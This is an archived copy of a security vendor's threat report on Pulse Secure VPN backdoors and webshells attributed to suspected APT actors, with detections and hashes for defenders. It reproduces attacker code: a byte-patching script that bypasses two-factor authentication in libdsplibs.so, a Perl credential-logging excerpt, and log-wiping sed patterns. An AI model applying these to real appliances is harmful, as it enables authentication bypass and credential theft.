{
	"id": "b485e36d-6e0b-49b9-b0f2-39f873e482a5",
	"created_at": "2026-04-06T00:09:15.96384Z",
	"updated_at": "2026-04-10T03:35:44.248652Z",
	"deleted_at": null,
	"sha1_hash": "2e1f557e18c735ef48576df8ad89e8d7f5f07be2",
	"title": "Authentication Bypass Techniques and Pulse Secure Zero-Day",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2343101,
	"plain_text": "Authentication Bypass Techniques and Pulse Secure Zero-Day\r\nBy Mandiant\r\nPublished: 2021-04-20 · Archived: 2026-04-05 20:56:37 UTC\r\nWritten by: Dan Perez, Sarah Jones, Greg Wood, Stephen Eckels\r\nExecutive Summary\r\nMandiant recently responded to multiple security incidents involving compromises of Pulse Secure VPN appliances.\r\nThis blog post examines multiple, related techniques for bypassing single and multifactor authentication on Pulse\r\nSecure VPN devices, persisting across upgrades, and maintaining access through webshells.\r\nThe investigation by Pulse Secure has determined that a combination of prior vulnerabilities and a previously\r\nunknown vulnerability discovered in April 2021, CVE-2021-22893, are responsible for the initial infection vector.\r\nPulse Secure’s parent company, Ivanti, released mitigations for a vulnerability exploited in relation to these malware\r\nfamilies and the Pulse Connect Secure Integrity Tool for their customers to determine if their systems are impacted. A\r\nfinal patch to address the vulnerability will be available in early May 2021.\r\nPulse Secure has been working closely with Mandiant, affected customers, government partners, and other forensic\r\nexperts to address these issues.\r\nThere is no indication the identified backdoors were introduced through a supply chain compromise of the company’s\r\nnetwork or software deployment process.\r\nIntroduction\r\nMandiant is currently tracking 12 malware families associated with the exploitation of Pulse Secure VPN devices. These\r\nfamilies are related to the circumvention of authentication and backdoor access to these devices, but they are not necessarily\r\nrelated to each other and have been observed in separate investigations. It is likely that multiple actors are responsible for\r\nthe creation and deployment of these various code families.\r\nThe focus of this report is on the activities of UNC2630 against U.S. 
Defense Industrial Base (DIB) networks, but detailed\r\nmalware analysis and detection methods for all samples observed at U.S. and European victim organizations are provided in\r\nthe Technical Annex to assist network defenders in identifying a large range of malicious activity on affected appliances.\r\nAnalysis is ongoing to determine the extent of the activity.\r\nMandiant continues to collaborate with the Ivanti and Pulse Secure teams, Microsoft Threat Intelligence Center (MSTIC),\r\nand relevant government and law enforcement agencies to investigate the threat, as well as develop recommendations and\r\nmitigations for affected Pulse Secure VPN appliance owners.\r\nAs part of their investigation, Ivanti has released mitigations for a vulnerability exploited in relation to this campaign as well\r\nas the Pulse Connect Secure Integrity Tool to assist with determining if systems have been impacted.\r\nDetails\r\nEarly this year, Mandiant investigated multiple intrusions at defense, government, and financial organizations around the\r\nworld. In each intrusion, the earliest evidence of attacker activity traced back to DHCP IP address ranges belonging to Pulse\r\nSecure VPN appliances in the affected environment.\r\nIn many cases, we were not able to determine how actors obtained administrator-level access to the appliances. However,\r\nbased on analysis by Ivanti, we suspect some intrusions were due to the exploitation of previously disclosed Pulse Secure\r\nvulnerabilities from 2019 and 2020, while other intrusions were due to the exploitation of CVE-2021-22893.\r\nWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the\r\nactor to use legitimate account credentials to move laterally into the affected environments. In order to maintain persistence\r\nin the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN\r\nappliance. 
This was done to accomplish the following:\r\n1. Trojanize shared objects with malicious code to log credentials and bypass authentication flows, including\r\nmultifactor authentication requirements. We track these trojanized assemblies as SLOWPULSE and its variants.\r\n2. Inject webshells we currently track as RADIALPULSE and PULSECHECK into legitimate Internet-accessible Pulse\r\nSecure VPN appliance administrative web pages for the devices.\r\n3. Toggle the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem.\r\n4. Maintain persistence across VPN appliance general upgrades that are performed by the administrator.\r\n5. Unpatch modified files and delete utilities and scripts after use to evade detection.\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 1 of 19\n\n6. Clear relevant log files utilizing a utility tracked as THINBLOOD based on an actor defined regular expression.\r\nIn a separate incident in March 2021, we observed UNC2717 using RADIALPULSE, PULSEJUMP, and HARDPULSE at a\r\nEuropean organization. Although we did not observe PULSEJUMP or HARDPULSE used by UNC2630 against U.S. DIB\r\ncompanies, these malware families have shared characteristics and serve similar purposes to other code families used by\r\nUNC2630. We also observed an OpenSSL library file modified in similar fashion as the other trojanized shared objects. We\r\nbelieve that the modified library file, which we’ve named LOCKPICK, could weaken encryption for communications used\r\nby the appliance, but do not have enough evidence to confirm this.\r\nDue to a lack of context and forensic evidence at this time, Mandiant cannot associate all the code families described in this\r\nreport to UNC2630 or UNC2717. 
We also note the possibility that one or more related groups are responsible for the\r\ndevelopment and dissemination of these different tools across loosely connected APT actors. It is likely that additional\r\ngroups beyond UNC2630 and UNC2717 have adopted one or more of these tools. Despite these gaps in our understanding,\r\nwe have included detailed analysis, detection techniques, and mitigations for all code families in the Technical Annex.\r\nSLOWPULSE\r\nDuring our investigation into the activities of UNC2630, we uncovered a novel malware family we labeled SLOWPULSE.\r\nThis malware and its variants are applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the\r\nauthentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so. Three of the four discovered\r\nvariants enable the attacker to bypass two-factor authentication. A brief overview of these variants is covered in this section;\r\nrefer to the Technical Annex for more details.\r\nSLOWPULSE Variant 1\r\nThis variant is responsible for bypassing LDAP and RADIUS-2FA authentication routines if a secret backdoor password is\r\nprovided by the attacker. The sample inspects login credentials used at the start of each protocol’s associated routine and\r\nstrategically forces execution down the successful authentication path if the provided password matches the attacker's\r\nchosen backdoor password.\r\nLDAP Auth Bypass\r\nThe routine DSAuth::LDAPAuthServer::authenticate begins the LDAP authentication procedure. 
This variant inserts a check\r\nagainst the backdoor password after the bind routine so that the return value can be conditionally stomped to spoof\r\nsuccessful authentication.\r\nFigure 1: LDAP Auth Bypass\r\nRADIUS Two Factor Auth Bypass\r\nThe routine DSAuth::RadiusAuthServer::checkUsernamePassword begins the RADIUS-2FA authentication procedure. This\r\nvariant inserts checks against the backdoor password after the RADIUS authentication packet is received back from the\r\nauthentication server. If the backdoor password is provided by the attacker, the packet type and successful authentication\r\nstatus flags are overwritten to spoof successful authentication.\r\nFigure 2: Radius-2FA Bypass\r\nSLOWPULSE Variant 2\r\nACE Two Factor Auth Credential Logging\r\nThis variant logs credentials used during the ACE-2FA authentication procedure\r\nDSAuth::AceAuthServer::checkUsernamePassword. Rather than bypassing authentication, this variant logs the username\r\nand password to a file for later use by the attacker.\r\nFigure 3: ACE Auth Credential Log\r\nSLOWPULSE Variant 3\r\nACE Two Factor Auth Bypass\r\nThis variant is responsible for bypassing the ACE-2FA logon procedure starting with\r\nDSAuth::AceAuthServer::checkUsernamePassword. The flow of the authentication procedure is modified to bypass the\r\nroutine responsible for verifying the username and password if the backdoor password is provided. 
With this modification\r\nthe attacker can spoof successful authentication.\r\nFigure 4: ACE Auth Bypass Variant\r\nSLOWPULSE Variant 4\r\nRealmSignin Two Factor Auth Bypass\r\nThis variant bypasses the RealmSignin::runSecondaryAuth procedure of the Pulse Secure VPN. The inserted logic modifies\r\nthe execution flow of a specific step of the login process to spoof successful authentication. We believe that this may be a\r\ntwo-factor authentication bypass.\r\nFigure 5: RealmSignIn 2FA Auth Bypass\r\nAttribution\r\nWe are in the early stages of gathering evidence and making attribution assessments, and there are a number of gaps in our\r\nunderstanding of UNC2630, UNC2717, and these 12 code families. Nevertheless, the Mandiant and Ivanti teams are\r\nproactively releasing this analysis to assist network defenders in triaging and identifying malicious activity on affected\r\nappliances.\r\nMandiant is able to assess that:\r\nUNC2630 targeted U.S. 
DIB companies with SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM,\r\nPACEMAKER, SLIGHTPULSE, and PULSECHECK as early as August 2020 until March 2021.\r\nWe suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5.\r\nUNC2717 targeted global government agencies between October 2020 and March 2021 using HARDPULSE,\r\nQUIETPULSE, and PULSEJUMP.\r\nWe do not have enough evidence about UNC2717 to determine government sponsorship or suspected\r\naffiliation with any known APT group.\r\nWe do not have enough information about the use of LOCKPICK to make an attribution statement.\r\nUNC2630\r\nUNC2630’s combination of infrastructure, tools, and on-network behavior appears to be unique, and we have not observed\r\nthem during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts\r\nnoted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor\r\nAPT5. We have also uncovered limited evidence to suggest that UNC2630 operates on behalf of the Chinese government.\r\nAnalysis is still ongoing to determine the full scope of the activity that may be related to the group.\r\nAlthough we are not able to definitively connect UNC2630 to APT5, or any other existing APT group, a trusted third party\r\nhas uncovered evidence connecting this activity to historic campaigns which Mandiant tracks as Chinese espionage actor\r\nAPT5. While we cannot make the same connections, the third-party assessment is consistent with our understanding of\r\nAPT5 and their historic TTPs and targets.\r\nAPT5 has shown significant interest in compromising networking devices and manipulating the underlying software which\r\nsupports these appliances. 
They have also consistently targeted defense and technology companies in the U.S., Europe, and\r\nAsia.\r\nAs early as 2014, Mandiant Incident Response discovered APT5 making unauthorized code modifications to files in\r\nthe embedded operating system of another technology platform.\r\nIn 2015, APT5 compromised a U.S. telecommunications organization providing services and technologies for private\r\nand government entities. During this intrusion, the actors downloaded and modified some of the router images related\r\nto the company’s network routers.\r\nAlso during this time, APT5 stole files related to military technology from a South Asian defense organization.\r\nObserved filenames suggest the actors were interested in product specifications, emails concerning technical\r\nproducts, procurement bids and proposals, and documents on unmanned aerial vehicles (UAVs).\r\nAPT5 persistently targets high-value corporate networks and often re-compromises networks over many years. Their\r\nprimary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary\r\ntargets (used to facilitate access to their primary targets) include network appliance manufacturers and software\r\ncompanies usually located in the U.S.\r\nRecommendations\r\nAll Pulse Secure Connect customers should assess the impact of the Pulse Secure mitigations and apply them if possible.\r\nOrganizations should utilize the most recent version of Pulse Secure’s Integrity Assurance utility released on March 31,\r\n2021. If a device fails this Integrity Assurance utility, network administrators should follow the instructions here and contact\r\ntheir Pulse CSR for additional guidance.\r\nOrganizations should examine available forensic evidence to determine if an attacker compromised user credentials. 
Ivanti\r\nhighly recommends resetting all passwords in the environment and reviewing the configuration to ensure no service\r\naccounts can be used to authenticate to the vulnerability.\r\nAdditional detections, mitigations and relevant MITRE ATT\u0026CK techniques are included in the Technical Annex. Sample\r\nhashes and analysis are included to enable defenders to quickly assess if their respective appliances have been affected. Yara\r\nrules, Snort rules, and hashes are published on Mandiant’s GitHub page.\r\nDetections and Mitigations\r\n1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc\r\nHARDPULSE contains an embedded 'recovery' URL https://ive-host/dana-na/auth/recover[.]cgi?token= that may be\r\naccessed by an attacker. The sample uses the POST parameters checkcode, hashid, m, and filename. This URL is not\r\npresent in legitimate versions of this file.\r\n7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a\r\n68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2\r\nd72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b\r\nPULSEJUMP, RADIALPULSE AND PACEMAKER use the following files to record credentials:\r\n/tmp/dsactiveuser.statementcounters\r\n/tmp/dsstartssh.statementcounters\r\n/tmp/dsserver-check.statementcounters\r\ncd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68\r\nThe malicious operations of SLOWPULSE can be detected via log correlation between the authentication servers\r\nresponsible for LDAP and RADIUS auth and the VPN server. 
Authentication failures in either LDAP or RADIUS\r\nlogs with the associated VPN logins showing success would be an anomalous event worthy of flagging.\r\na1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1\r\nUpon invocation of the PULSECHECK webshell, the following HTTP request headers will be sent:\r\nKey Value\r\nREQUEST_METHOD POST\r\nHTTP_X_KEY \u003cBackdoorKey\u003e\r\nHTTP_X_CNT \u003cRC4Key\u003e\r\nHTTP_X_CMD \u003cRC4Command\u003e\r\n1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd\r\nSLOWPULSE VARIANT 2 writes ACE logon credentials to the file /home/perl/PAUS.pm in a+ (append) mode,\r\nusing the format string %s:%s\\n.\r\n68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2\r\nPACEMAKER is saved at filepath /home/bin/memread\r\nExecuted with commandline flags -t, -m, -s\r\nAttaches to victim processes with PTRACE and opens subfiles in /proc/\r\n88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079\r\nTHINBLOOD creates the files:\r\n/home/runtime/logs/log.events.vc1\r\n/home/runtime/logs/log.events.vc2\r\n/home/runtime/logs/log.access.vc1\r\n/home/runtime/logs/log.access.vc2\r\nExecutes the system API with the mv command specifying one of the files above, targeting:\r\n/home/runtime/logs/log.access.vc0\r\n/home/runtime/logs/log.events.vc0\r\nExecutes the rm command specifying one of the .vc1 files above\r\n133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a\r\nSLIGHTPULSE uses /tmp/1 as a command execution log\r\nAll POST requests to meeting_testjs.cgi are suspicious\r\nPOST parameters: cert, img, name are used by malicious logic\r\nResponses to the endpoint with the name parameter respond with no-cache and image/gif\r\n1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9\r\nTHINBLOOD execution of sed on the 
files:\r\nlog.events.vc0\r\nlog.access.vc0\r\nLog.admin.vc0\r\nSed patterns used:\r\ns/.\\x00[^\\x00]*[^\\x00]*\\x09.\\x00//g\r\ns/\\x\\x00[^\\x00]*[^\\x00]*\\x09\\x\\x00//g\r\n06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7\r\nThe sample accepts an input and output file as its first and second arguments, then writes a patched version of the\r\ninput out. The commandline argument e or E must be supplied as the fourth argument. Example command line:\r\n./patcher input.bin output.bin backdoorkey e\r\nf2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90\r\nThe sample uses the HTTP query parameter id and responds with HTTP headers \"Cache-Control: no-cache\\n\" and\r\n\"Content-type: text/html\\n\\n\".\r\n224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450\r\n64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7\r\n78d7c7c9f800f6824f63a99d935a4ad0112f97953d8c100deb29dae24d7da282\r\n705cda7d1ace8f4adeec5502aa311620b8d6c64046a1aed2ae833e2f2835154f\r\nExecutes sed on PulseSecure system files\r\nRemounts filesystem as writable: system(\"/bin/mount -o remount,rw /dev/root /\")\r\nUnexpected execution of other system commands such as tar, cp, rm\r\nMITRE ATT\u0026CK Techniques\r\nThe following list of MITRE ATT\u0026CK techniques covers all malware samples described in this report as well as those\r\nobserved throughout the lifecycle of UNC2630 and UNC2717.\r\nT1003-OS Credential Dumping\r\nT1016-System Network Configuration Discovery\r\nT1021.001-Remote Desktop Protocol\r\nT1027-Obfuscated Files or Information\r\nT1036.005-Match Legitimate Name or Location\r\nT1048-Exfiltration Over Alternative Protocol\r\nT1049-System Network Connections Discovery\r\nT1053-Scheduled Task/Job\r\nT1057-Process Discovery\r\nT1059-Command and Scripting Interpreter\r\nT1059.003-Windows Command Shell\r\nT1070-Indicator 
Removal on Host\r\nT1070.001-Clear Windows Event Logs\r\nT1070.004-File Deletion\r\nT1071.001-Web Protocols\r\nT1082-System Information Discovery\r\nT1098-Account Manipulation\r\nT1105-Ingress Tool Transfer\r\nT1111-Two-Factor Authentication Interception\r\nT1133-External Remote Services\r\nT1134.001-Access Token Manipulation: Token Impersonation/Theft\r\nT1136-Create Account\r\nT1140-Deobfuscate/Decode Files or Information\r\nT1190-Exploit Public-Facing Application\r\nT1505.003-Web Shell\r\nT1518-Software Discovery\r\nT1554-Compromise Client Software Binary\r\nT1556.004-Network Device Authentication\r\nT1592.004-Gather Victim Host Information: Client Configurations\r\nT1562-Impair Defenses\r\nT1569.002-Service Execution\r\nT1574-Hijack Execution Flow\r\nT1600-Weaken Encryption\r\nFigure 6: MITRE ATT\u0026CK Map\r\nTechnical Annex\r\nSLIGHTPULSE\r\nThe file meeting_testjs.cgi (SHA256: 133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a) is a\r\nwebshell capable of arbitrary file read, write, and command execution. Malicious logic is inserted at the end of legitimate\r\nlogic to respond to POST requests. We believe this webshell may be responsible for placing additional webshells and used to\r\nmodify legitimate system components resulting in the other observed malware families due to its functionality.\r\nThe malicious logic inserts a branch condition to respond to HTTP POST requests rather than just the typical GET requests\r\nexpected of the legitimate code. If GET requests are performed the legitimate logic is still invoked. POST requests have a\r\nseries of parameters checked for existence to determine which command to invoke. 
This logic is:\r\nPOST params -\u003e Invoked Command\r\ncert -\u003e writefile\r\nimg, name with nonempty value -\u003e readfile\r\nimg set to empty string \"\", name -\u003e execcmd\r\nanything else -\u003e invoke original legitimate logic\r\nFigure 7: Webshells respond to POSTs\r\nAll incoming and outgoing requests are base64 encoded/decoded and RC4 encrypted/decrypted. The scheme is simple. The\r\nfirst six characters of the data are a random key generated per request as a sort of nonce, with the static RC4 key appended.\r\nThis nonce + phrase together act as the RC4 key. The phrase is not sent over the wire, only the nonce. This entire key is then\r\nused to encrypt/decrypt payload data that immediately follows the key. The form of data on the wire is:\r\nOutbound/Inbound:\r\n\u003c6randbytes\u003e\r\n^-RC4NONCE-^\r\nUsage:\r\n\u003c6randbytes\u003e\r\n^-------RC4 KEY--------^\r\nReadFile\r\nThis command accepts a base64 encoded, RC4 encrypted file name via the img parameter and opens it for read. The file\r\ncontents are read in full then sent back to the attacker as base64 encoded, RC4 encrypted data with the headers \"Content-type: application/x-download\\n\", and form header \"Content-Disposition: attachment; filename=tmp\\n\\n\".\r\nWriteFile\r\nThis command accepts a base64 encoded, RC4 encrypted filename via the cert parameter, and base64 encoded, RC4\r\nencrypted file data via the parameter md5. The filename is opened in write mode with the file data being written to the file\r\nbefore the file is closed. The results of this command are sent back to the attacker, using the headers \"Cache-Control: no-cache\\n\" and \"Content-type: text/html\\n\\n\".\r\nExecute\r\nThis command accepts a base64 encoded, RC4 encrypted command via the name parameter. The malicious logic forbids\r\nthe cd command and will respond with the text Error 404 if executed. 
All other commands will be executed via the system\r\nAPI with output piped to the file /tmp/1. The full system command is \u003e/tmp/1 2\u003e\u00261. The output of this execution is read\r\nand sent back to the attacker base64 encoded, RC4 encrypted. The headers \"Cache-Control: no-cache\\n\" and \"Content-type:\r\nimage/gif\\n\\n\" are used. The response appears to be masquerading as a GIF when sending back this command output.\r\nRADIALPULSE\r\nThe file with the SHA256 hash d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b is a modified\r\nPerl script associated with a PulseSecure web-based tool which causes usernames, passwords and information associated\r\nwith logins to this application to be written to the file /tmp/dsstartssh.statementcounters.\r\nRetrieval of these login credentials must be achieved through other means such as an interactive login or a webshell.\r\nPersistence is achieved by the addition of compromised code which is continually served when requesting this PulseSecure\r\nwebpage.\r\nAn excerpt of the code related to credential stealing is shown as follows:\r\nmy $realmName1 = $signin-\u003egetRealmInfo()-\u003e{name};\r\nopen(*fd, \"\u003e\u003e/tmp/dsstartssh.statementcounters\");\r\nsyswrite(*fd, \"realm=$realmName1 \", 5000);\r\nsyswrite(*fd, \"username=$username \", 5000);\r\nsyswrite(*fd, \"password=$password\\n\", 5000);\r\nclose(*fd);\r\nSLOWPULSE Variant 1\r\nThe file libdsplibs.so with SHA256 cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68 is a\r\ntrojanized ELF shared object belonging to the PulseSecure VPN server. The sample has been modified to bypass specific\r\nauthentication mechanisms of the LDAP and RADIUS protocols. The sample hardcodes a backdoor key that will silently\r\nsubvert auth failures if the correct backdoor key is passed, establishing a VPN connection as if auth succeeded. 
If the\r\nbackdoor password is not used, authentication will fail as normal.\r\nIn multiple locations assembly is written into the padding regions between legitimate functions. As these regions are very\r\nsmall, around 20 bytes, the malicious logic stitches itself together by unconditionally jumping between multiple padding\r\nregions. The assembly is written in a way very similar to mid-function hooks, where it is common to push and then pop all\r\nflags and registers before and after the injected logic. By preserving registers and flags in this way the malicious logic is able\r\nto execute as a passive observer if desired, only affecting the control flow in specific\r\nconditions. This is employed in two locations, the LDAP and RADIUS authentication\r\nroutines, DSAuth::LDAPAuthServer::authenticate and DSAuth::RadiusAuthServer::checkUsernamePassword respectively.\r\nLDAP Auth Bypass\r\nIn the typical execution of DSAuth::LDAPAuthServer::authenticate the legitimate application constructs the C++\r\nobject DSAuth::LDAPAuthServer::ldap then passes it to DSLdapServer::bind with the username and password for login.\r\nThis bind may fail or succeed, which determines the authentication failure or success of the LDAP protocol. The malicious\r\nlogic inserted into the application redirects execution before DSLdapServer::bind just after the ldap object is constructed. At\r\nthis point in execution the username and password are easily extracted from memory with mid-function hooking techniques,\r\nwhich the sample copies to a code cave in memory between two functions as a temporary storage location. The malicious\r\nlogic then invokes DSLdapServer::bind as the normal logic would, which sets the return register EAX to 0 or 1 for failure or\r\nsuccess. A check is then executed where the temporary password copy made earlier is checked against a hardcoded backdoor\r\npassword. 
If this check passes the backdoor logic activates by overwriting EAX to 1 to force the application down the\r\nexecution path of successful authentication, even though in reality authentication failed.\r\nRADIUS Two Factor Auth Bypass\r\nIn the typical execution of DSAuth::RadiusAuthServer::checkUsernamePassword the legitimate application sends a\r\nRADIUS-2FA auth packet with username and password via RadiusAuthPacket::sendRadiusPacket. The response is then\r\nretrieved and parsed by the routine DSAuth::RadiusAuthServer::handleResponse. After packet retrieval the packet type is\r\nverified to be 3; it is not known what this packet type specifies, but this is the packet type of a successful authentication\r\nresponse. If the packet type check passes, then the sample reads a field of the packet that specifies if authentication was\r\nsuccessful or not and then checks this status later. The inserted malicious logic hijacks execution just\r\nafter DSAuth::RadiusAuthServer::handleResponse where the password sent to the RADIUS server is checked against a\r\nbackdoor password. If this check passes the malicious logic overwrites the retrieved packet with values indicating that it's of\r\ntype 3 and that authentication was successful. The malicious logic then rejoins the original execution flow where the packet\r\ntype is checked. If written, the spoofed values force the application down the execution path of successful authentication,\r\neven though in reality authentication failed.\r\nSLOWPULSE Variant 2\r\nACE Two Factor Auth Credential Logging\r\nWe also identified a variant of SLOWPULSE\r\n(SHA256: 1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd) which logs credentials used\r\nduring ACE-2FA protocol authentication.\r\nThe backdoor is implemented in the routine DSAuth::AceAuthServer::checkUsernamePassword. 
As part of the login\r\nprocedure the username and password are retrieved then written into a map entry structure. The backdoor inserts an\r\nunconditional jump into the logon logic that takes this map entry structure, reads the username and password fields, then\r\nwrites them to the file /home/perl/PAUS.pm in a+ (append) mode, using the format string %s:%s\\n. The backdoor then\r\nunconditionally jumps back into the normal control flow to continue the logon process as normal.\r\nSLOWPULSE Variant 3\r\nACE Two Factor Auth Bypass\r\nWe identified another variant of SLOWPULSE\r\n(SHA256: b1c2368773259fbfef425e0bb716be958faa7e74b3282138059f511011d3afd9) which is similar to SLOWPULSE\r\nVARIANT 2: the malicious logic lives within DSAuth::AceAuthServer::checkUsernamePassword, however this variant\r\nbypasses the logon procedure rather than logging login credentials. Typical execution of this routine calls DsSecID_checkLogin to\r\nvalidate the username and password which sets the EAX register to 1. The\r\nroutine DSAuth::AceAuthServer::handleACEAuthResult then checks EAX to determine if auth was successful or not. The\r\nmalicious logic hijacks execution immediately after the username and password fields are written to their map entries, then\r\nchecks if the password matches the backdoor password. If the password matches, then the EAX register is overwritten to 1.\r\nThis puts the program in the same state as if DsSecID_checkLogin had successfully executed, but unlike SLOWPULSE\r\nVARIANT 1 the original authentication routine is not called at all. The malicious logic then rejoins execution\r\nbefore DSAuth::AceAuthServer::handleACEAuthResult which will now pass. 
This forces the application down the\r\nexecution path of successful authentication, even though in reality authentication would have failed.\r\nSLOWPULSE Variant 4\r\nRealmSignin Two Factor Auth Bypass\r\nWe identified a fourth variant of SLOWPULSE responsible for bypassing what may be the two-factor authentication step of\r\nthe DSAuth::RealmSignin process. The backdoor is present within the function DSAuth::RealmSignin::runSigninStep. This\r\nroutine is responsible for multiple steps of the login procedure and is implemented as a large switch statement. Case 11 of\r\nthe switch statement typically calls the\r\nroutines DSMap::setPrivacyKeyNames then DSAuth::RealmSignin::runSecondaryAuth. The malicious logic in this variant\r\noverwrites the call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1. This forces application flow as if\r\nDSAuth::RealmSignin::runSecondaryAuth always succeeds, without ever calling it. We were not able to recover a file with\r\nthese patches applied as the attacker removed their patches after use. However, we did uncover both the patcher and\r\nunpatcher utilities. We do not provide a hash for this file as we have not recovered it from a system in the field. This analysis\r\nwas performed by replaying the changes performed by the patcher we did recover.\r\nSLOWPULSE Variant 2 Patcher\r\nAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert\r\nthe malicious logic into the original libdsplibs.so file. The file with\r\nSHA256: c9b323b9747659eac25cec078895d75f016e26a8b5858567c7fb945b7321722c is responsible for inserting\r\nSLOWPULSE V2 malicious logic to log ACE credentials. The patcher accepts two command line arguments, the path to the\r\noriginal binary and the patched output file path. The original binary is read into memory, patched, and then written to the\r\noutput path. 
The assembly patches and offsets into the original binary are hardcoded.\r\nSLOWPULSE Variant 3 Patcher\r\nAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert\r\nthe malicious logic into the original libdsplibs.so file. The file with\r\nSHA256: 06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7 is responsible for inserting\r\nSLOWPULSE V3 malicious logic to bypass the ACE logon authentication process. The patcher accepts four arguments. The\r\nfirst argument is the original binary path, the second the patched output file path, the third is the backdoor bypass password, and\r\nthe fourth is the letter e, specifying that patches should be applied. The sample reads the original binary into memory, applies the assembly\r\npatches associated with SLOWPULSE V3 together with the provided bypass password, then writes the result to the output path. The\r\nassembly patches and all offsets, including where to copy the bypass password, are hardcoded.\r\nSLOWPULSE Variant 4 Patcher\r\nAs part of our investigation into the SLOWPULSE family we recovered the utility the attacker used to insert the malicious\r\nlogic into the original libdsplibs.so file. The file with\r\nSHA256: e63ab6f82c711e4ecc8f5b36046eb7ea216f41eb90158165b82a6c90560ea415 is responsible for inserting the patch for\r\nSLOWPULSE V3. The patch applied overwrites a single call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1.\r\nThis patcher utility is a simple bash script, unlike the previous patchers, which were compiled applications likely written in\r\nC. 
The script in full is:\r\nprintf '\\xB8' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B31))\r\nprintf '\\x01' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B32))\r\nprintf '\\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B33))\r\nprintf '\\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B34))\r\nprintf '\\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B35))\r\nSLOWPULSE Variant 4 UnPatcher\r\nAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to remove\r\nthe malicious logic from the original libdsplibs.so file for SLOWPULSE V4. The attacker chose to remove the patches\r\napplied to libdsplibs.so. The file with\r\nSHA256: b2350954b9484ae4eac42b95fae6edf7a126169d0b93d79f49d36c5e6497062a is the unpatcher utility for\r\nSLOWPULSE V4. This sample is also a simple bash script; in full it is:\r\nprintf '\\xE8' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B31))\r\nprintf '\\xE2' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B32))\r\nprintf '\\x08' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B33))\r\nprintf '\\xD0' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B34))\r\nprintf '\\xFF' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B35))\r\nSTEADYPULSE\r\nThe file licenseserverproto.cgi (SHA256: 168976797d5af7071df257e91fcc31ce1d6e59c72ca9e2f50c8b5b3177ad83cc) is a\r\nwebshell, implemented by modifying a legitimate Perl script used by a Pulse Secure tool, that enables arbitrary\r\ncommand execution.\r\nThe attacker inserted two blocks of Perl code that implement the webshell. The source code modifications are surrounded by\r\ncomments that indicate the start and end of inserted code. 
The comment strings used\r\nare ##cgistart1, ##cgiend1, ##cgistart2 and ##cgiend2. Although the exact purpose of these comment strings is unknown, the\r\nattacker may use them to facilitate updates to the malicious code or to allow for its quick removal if necessary.\r\nThe Perl script enclosed in the tags ##cgistart1 and ##cgiend1 adds several lines to import Perl modules that are used\r\nby the webshell. It also adds a function to parse parameters of received command data.\r\nThe script enclosed in the tags ##cgistart2 and ##cgiend2 is responsible for checking web requests designed to be\r\nexecuted by the webshell, if present. If no webshell request is found, the script passes execution to the legitimate Perl\r\nscript for the webpage.\r\nThe webshell portion of the script is invoked when it receives a form submission name=value pair of serverid matching a\r\nsecret key. This causes the webshell to extract the string passed to it via the QUERY_STRING CGI environment variable.\r\nIndividual key/value pairs are delimited by the \u0026 character and are URL decoded. Although the script parses out all key/value\r\npairs it receives, it specifically looks for and extracts data associated with the cmd parameter. If found, it will generate a\r\nform containing the extracted cmd 